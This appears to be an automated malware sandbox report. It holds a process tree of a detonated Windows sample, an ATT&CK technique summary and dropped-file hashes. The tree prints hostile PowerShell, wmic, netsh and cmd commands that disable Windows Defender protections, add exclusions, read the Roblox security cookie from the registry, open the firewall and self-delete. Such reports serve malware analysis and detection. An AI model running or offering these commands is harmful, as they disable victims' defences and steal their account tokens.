C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:8348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 25⤵
- Command and Scripting Interpreter: PowerShell
PID:9116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
PID:4628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵PID:8984
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption5⤵PID:2024
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory5⤵PID:8544
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵PID:8672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
PID:8604
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name5⤵
- Detects videocard installed
PID:3564
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8996 -
C:\Windows\system32\PING.EXEping localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9148
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"4⤵PID:4412
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:8564
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ctfmon.exe3⤵
- Kills process with taskkill
PID:6748
-
-
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\wim.dllwim.dll3⤵PID:5568
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wim_54feb21e-33bc-430a-b317-c9e501f91498\load.cmd" "4⤵PID:5572
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_54feb21e-33bc-430a-b317-c9e501f91498\cringe.mp4"5⤵PID:4064
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_54feb21e-33bc-430a-b317-c9e501f91498\lol.ini5⤵PID:4848
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\web2.htm3⤵PID:9152
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe305946f8,0x7ffe30594708,0x7ffe305947184⤵PID:9184
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\xcer.cer3⤵PID:3452
-
-
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\f3cb220f1aaa32ca310586e5f62dcab1.exef3cb220f1aaa32ca310586e5f62dcab1.exe3⤵PID:8780
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account4⤵PID:9092
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe305946f8,0x7ffe30594708,0x7ffe305947185⤵PID:2384
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video4⤵PID:4860
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x110,0x114,0x118,0xec,0x11c,0x7ffe305946f8,0x7ffe30594708,0x7ffe305947185⤵PID:5520
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/4⤵PID:8700
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe305946f8,0x7ffe30594708,0x7ffe305947185⤵PID:9144
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- Delays execution with timeout.exe
PID:7532
-
-
C:\Windows\SysWOW64\xcopy.exexcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop3⤵PID:8532
-
-
C:\Windows\SysWOW64\regedit.exeregedit3⤵
- Runs regedit.exe
PID:8456
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5248
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5640
-
C:\Windows\system32\efsui.exeefsui.exe /efs /keybackup1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5692
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4588 -ip 45881⤵PID:5816
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\4db139e92a77457a884aa834723d8dd9 /t 6048 /p 26801⤵PID:6364
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:3964
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3028 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 25753 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {61824777-8a7f-4138-8d1a-41c1c8262b91} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" gpu3⤵PID:4192
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2264 -parentBuildID 20240401114208 -prefsHandle 2364 -prefMapHandle 2360 -prefsLen 25789 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {104cc488-1700-41e6-92d4-907aa1cb8c13} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" socket3⤵PID:6940
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3168 -childID 1 -isForBrowser -prefsHandle 3148 -prefMapHandle 2820 -prefsLen 25930 -prefMapSize 244658 -jsInitHandle 1152 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f54e2fab-86a6-432a-9f20-3c1576bbd1b0} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" tab3⤵PID:7140
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3444 -childID 2 -isForBrowser -prefsHandle 3528 -prefMapHandle 3640 -prefsLen 31163 -prefMapSize 244658 -jsInitHandle 1152 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4860a9ea-3bf1-42ad-815e-6468b0f59b13} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" tab3⤵PID:6172
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4328 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 3752 -prefMapHandle 3808 -prefsLen 31163 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bcfde0c4-cf8c-4411-8e28-84d2ee17684c} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" utility3⤵
- Checks processor information in registry
PID:6540
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5288 -childID 3 -isForBrowser -prefsHandle 5272 -prefMapHandle 4320 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1152 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f936a2c0-87ba-472d-b6af-7c3734bd1c5e} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" tab3⤵PID:7660
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5520 -childID 4 -isForBrowser -prefsHandle 5328 -prefMapHandle 5304 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1152 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0fe132b9-b0f1-4b8b-94ff-f88e19cb3251} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" tab3⤵PID:7692
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5536 -childID 5 -isForBrowser -prefsHandle 5528 -prefMapHandle 5524 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1152 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a7816a9-6dd3-4cc3-9394-0fa224b09897} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" tab3⤵PID:7788
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7104 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe233ccc40,0x7ffe233ccc4c,0x7ffe233ccc582⤵PID:3248
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2364,i,2606904174173247439,14425903102899201027,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2360 /prefetch:22⤵PID:6920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1804,i,2606904174173247439,14425903102899201027,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2408 /prefetch:32⤵PID:6924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1832,i,2606904174173247439,14425903102899201027,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2512 /prefetch:82⤵PID:6900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,2606904174173247439,14425903102899201027,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3128 /prefetch:12⤵PID:8072
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,2606904174173247439,14425903102899201027,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3180 /prefetch:12⤵PID:8080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,2606904174173247439,14425903102899201027,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4520 /prefetch:12⤵PID:6960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4044,i,2606904174173247439,14425903102899201027,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5028 /prefetch:82⤵PID:9168
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"1⤵PID:376
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1592 -ip 15921⤵PID:7292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:7484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:7592
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:3948
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x340 0x50c1⤵PID:8248
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:8740
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:9004
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
5Disable or Modify System Firewall
2Disable or Modify Tools
3Indirect Command Execution
1Modify Registry
6Obfuscated Files or Information
1Command Obfuscation
1Subvert Trust Controls
1SIP and Trust Provider Hijacking
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Browser Information Discovery
1Password Policy Discovery
1Peripheral Device Discovery
1Process Discovery
1Query Registry
6Remote System Discovery
1System Information Discovery
7System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.9MB
MD56bb0ab3bcd076a01605f291b23ac11ba
SHA1c486e244a5458cb759b35c12b342a33230b19cdf
SHA256959dafbfab08f5b96d806d4ad80e4c3360759c264d3028e35483a73a89aa1908
SHA512d1123feb97fbf1593ce1df687b793a41f398c9a00437e6d40331ad63b35fc7706db32a0c6f0504cff72ea2c60775b14f4c0d5a8955988048bed5ba61fa007621
-
Filesize
653KB
MD5cff6264b7200544a44f7ec22adc40530
SHA11adab643a43aff7b37dcd561895f2194193374dc
SHA256a11a9e0a5c37c2ac8c60723747bfeffc0ed2a58061090b08ffa7f4856b4769fa
SHA512c2bdb0313723bb2eacd4632a8a467540b244d5d55152e58b8d59d92a833a127d2f6043da15fd4567413113a922a641d263b6dfba6cccd2bc2499e3d20c14e9c1
-
Filesize
187KB
MD5efedc80482b249d448d8939f4347dd04
SHA1b7abc85ad9cc52c264473493b28df8aad2eb0be8
SHA256144b0da90e8a3721a58d22b460b017854a11c308578ad7f5e3825361fa1cfa5c
SHA5125f4bb47ea65ebeb2b7f66a200cc42974a3a1e5cdcc16bbb0a851c4e11034da8751ff1fdc222ec426fafd73a010e3461fd84af9f4fc63a581f917748891b27446
-
Filesize
1KB
MD538169b0b30cb24fd7b8aa46eb9f102b3
SHA1131939b36b4be94c453d55a9b01f25876c1e91f4
SHA25669e309cb427c9fa463da4c29a3f67466317b737ac257f0b76866991f9c6d3a40
SHA5128564264d79f394d20bfa62d3e2a2e717e5dbda2d6d3b05d1557202e7ce8b064dc10c9801d34b1e753e9f12baf9a8d6fc388a5fded010f0dced934abf9000a96d
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
356B
MD5e8018e159dd0c2bce152176e834cf2b5
SHA1a6aab3b490edf96edf8c79b4272af5b410255c28
SHA2562056a64d8900546aebe8fbde5dae3099590d065788de9b327fdc13684dc2e19a
SHA512770702aa85405a81c29c257aa4be7625cdeac752789c9574459375c84c8fcdba0d4cb6042e5efc54585382e140144fd58b4afab628e9be5353b5e8aa7925dbe2
-
Filesize
8KB
MD538fdcbfb98388db6bb7b7f6db5f6a0d3
SHA14f3f3a76ec426a6ba25c86293cbfb30e347ca5e4
SHA2565c0b9a2423f25adf4567cc1ffc7ff5b3dd4ff60af9c772b1fe3cb70bc35057a0
SHA5127b8b875aee80d7ec57f5c932558d139349068a8dfe6f6e2f4b250d8b219631fb255f0d4ac3e3c6342290f7c1d54ace77fa35f4179731afb480652045113a896f
-
Filesize
8KB
MD5c0ede52bedd8b7f3453a3bdd1806fafd
SHA116775c78d9fb34fc16c3693ca43ebacc47e6a389
SHA256a36808846b5a311f92b04f24996604e3fdf04c2e5e4ac26ca77cada126073660
SHA5127d48a349b070f9a74ff06a10f1e6587ddba1709e944cb1d3745e5d34b54e558351502c0485cab7bbbe371d37a67b19e1ba32d1750a984118683c0cf015f60156
-
Filesize
9KB
MD56942dac4714862214398d1b93eed1bf8
SHA1ace74ce540dd9b3f6085984735a579be856777ed
SHA25605e2f9930ead0d05007527d9add6358f0c85a3b31fd5bc32999bf52fb45f3b57
SHA512399e7954f5786d344be9a7927017ce89998c2e5e2338c8e4dad1e9916a4b913cde7d926c032b00180976f5b8ba5f33450ad587004b5f137f1a59894d27fb1131
-
Filesize
9KB
MD5ea093738918f940dc556e70d7b67fb9c
SHA159a8b0d7e40aa6f92793be18b11ccf7ce9a54d2e
SHA2562b3e5a6871cc6d67b64c07f32068e81cb870e4d2f199b0b6cf87dc91a9f8b09f
SHA512261303c45d1accd834bab080e4268f777ca00591d17b7e7e89c5cb2fa2b4e0ccdc4f86257de49d06fb5e8810605b7dc021d1c4555d97acf7ff1246f0567e631b
-
Filesize
9KB
MD57be93a46c1caead2c36b5b55efce4fe8
SHA10e5fcbfde78fd2eef5b0ee5155c21c2ba2f29358
SHA25683bd49a72f7f9a11a18ed718e3db9e68838893599714c8ac81b3d0a8026c1d67
SHA51248ca9da8648646f284067fd82e9136ecc45d0f46184fec662c89afbf815812c1898f1c121f33f7bd6301a458f7b5a8e8d5436bc17e024fb7bf40cc5fee29a6b4
-
Filesize
9KB
MD5f313f141ef3673ba0f1366e7f91bb780
SHA1d4121dd0fcfc0240b62108c49fc5060acf168dc0
SHA2562e461eccfeb0838376c86a1c97f31e231a2879f222a7d87d2f1bf474b6bd1cd7
SHA51241a55d9d96692c43849b714d9d8c0a9606800468e11a2ed80a85e3f063ab6689f52d8a317ea42a59df37eda060ae9eefacd14e5ba47505a40cdd16393f201e05
-
Filesize
9KB
MD5fdeb4742c7ec424d0be7f18295e047cf
SHA193d1e582e78951639ed15d38893e7d7e0f93b19c
SHA256a913ccf738c880ce7945c43aaa9ed96167bd0ac5daa7ef29cca3aa4c0c8d5ffb
SHA5122ef7a0dc464a4c924a308fda47df4bc5e62b89093b8726b3d2420a6704548ccfdc3451813c58a62987e2fd776e61ca5abaa24fb24499f3df71ca86ecb413922c
-
Filesize
9KB
MD54e0f0b1c26e581dbc61d092a07ff8995
SHA1f57ff6820235a8ab43c6b2ae9145b1f518b8cba8
SHA25613af4fd4343166b504cbd56ac9124fd951ab29e79f4670dcd15fb1cfcbf6260d
SHA5127e458547ab557a42a80f9e0e8b468ba28d881db96e32f7feb035c05bcaa26923de33ab9b175d91b1b958c7af4bbeabbb2b21e549f247909cd9289834592f2945
-
Filesize
9KB
MD5cee5732df0feef4ce96808bec0068d2f
SHA11cb6d404077fa10c03567801fddad5f2e67d593b
SHA2562b84cbf560c0ae7da63cede71fb0be6f71739a0d5a43875492e3816094354ff7
SHA51264c80350a023bd6f2b4ae935eef5cc5cee1a0582f495597b8b4a232bea1c1b033882fe44e56bc7f594f2029017db9582343a88e57776d9db024f6aa68e4391a1
-
Filesize
92KB
MD5e0f1662589ce0bda654fc72730f9bf8b
SHA17d3f79ca5eedaafc0cd37ae5744b7e0fa13d37af
SHA2563a4b9065b857c8f35ab78208c56aa91bb06dc6b38dc17ec65cfc124441a487e2
SHA51294f1c0b68d3baba96c19df8999b023c986ec7aa9213a322dd8ef558f26059b113037ac45c73d4bd78e7f01cab5f7611b0d0fff02feefda07855cbbe296c1d17c
-
Filesize
92KB
MD59f9ff53790f80de25bc75862e1b3cf30
SHA1e49f023fc7fee94273410b639645158f9a739adb
SHA256037c456cc87cf42af1edf06de884f7f59946a1b9ec20924d5836adbffa12f605
SHA512a53e80ac01886bd6bdb7bee9dad2060a4386379cc15a255601c154e5f4de9dab222193845e69fdf7e908420f3f99a020ecc73c646f82ef1fc7ed72aef4492da7
-
Filesize
152B
MD554aadd2d8ec66e446f1edb466b99ba8d
SHA1a94f02b035dc918d8d9a46e6886413f15be5bff0
SHA2561971045943002ef01930add9ba1a96a92ddc10d6c581ce29e33c38c2120b130e
SHA5127e077f903463da60b5587aed4f5352060df400ebda713b602b88c15cb2f91076531ea07546a9352df772656065e0bf27bd285905a60f036a5c5951076d35e994
-
Filesize
152B
MD52f842025e22e522658c640cfc7edc529
SHA14c2b24b02709acdd159f1b9bbeb396e52af27033
SHA2561191573f2a7c12f0b9b8460e06dc36ca5386305eb8c883ebbbc8eb15f4d8e23e
SHA5126e4393fd43984722229020ef662fc5981f253de31f13f30fadd6660bbc9ededcbfd163f132f6adaf42d435873322a5d0d3eea60060cf0e7f2e256262632c5d05
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize120B
MD58df9c6ac2a9c99e7e3c16efc55ef5b4c
SHA11b4a2c261d86437031c6d28ea85ee6ac006bd1f2
SHA256ba9e481352cfd4bf8d181418a8e22face53219c32c2df6925cd2032ba771dd3b
SHA51231a3d2e26c5c263f478373aa1dbe2f5e73b835cbdb7cb7d4a47ff3445a04f6cc76d17ec9d8b12f955329f9e2749abd21957688993890793e8561bec813e1f0e2
-
Filesize
1KB
MD56870ee1d64c805d7d48effbdfe8f8198
SHA13237a22da81051fa76ca3ddbad603892afe71dea
SHA256a5f1265ac6c6d485c3e563a493f393aa20db3cbadfa8e58058e8b00bbba553c6
SHA5122c0e8d289fd1da69f3c6a99d9e07087529831113049a6852a27f9a271f54fb2b32038da7acb325dde269c1f1b5c46210edfab652d5a4b23c22e35b2f3f6a92f7
-
Filesize
6KB
MD568f58138ab4933b41fcf84fdc1ea45ee
SHA1caefd59a73be24e4b4875a04ee7105817155dcce
SHA2561b3e25ab8f45faf46d41d74c94740cb5e97f4ba1c1ccc272a5b7bc352618a15e
SHA512bd2a105f7f1f11f36ae55b738475dab2e73af9de0fe6dde64b623822fef6e637cb8030a13fbc603d852edd9542f66f5d40c6c2cec6709dfd2656bb66d16adbf3
-
Filesize
5KB
MD5f13df2b9264c842e3683dadd57ba107c
SHA169b818dd224c83bd2c14ee5aa2a5484c5952698d
SHA256dc0ad1e34e9981a2759f2719abedc554c8560a9d7c332499102e8ce0f14e967b
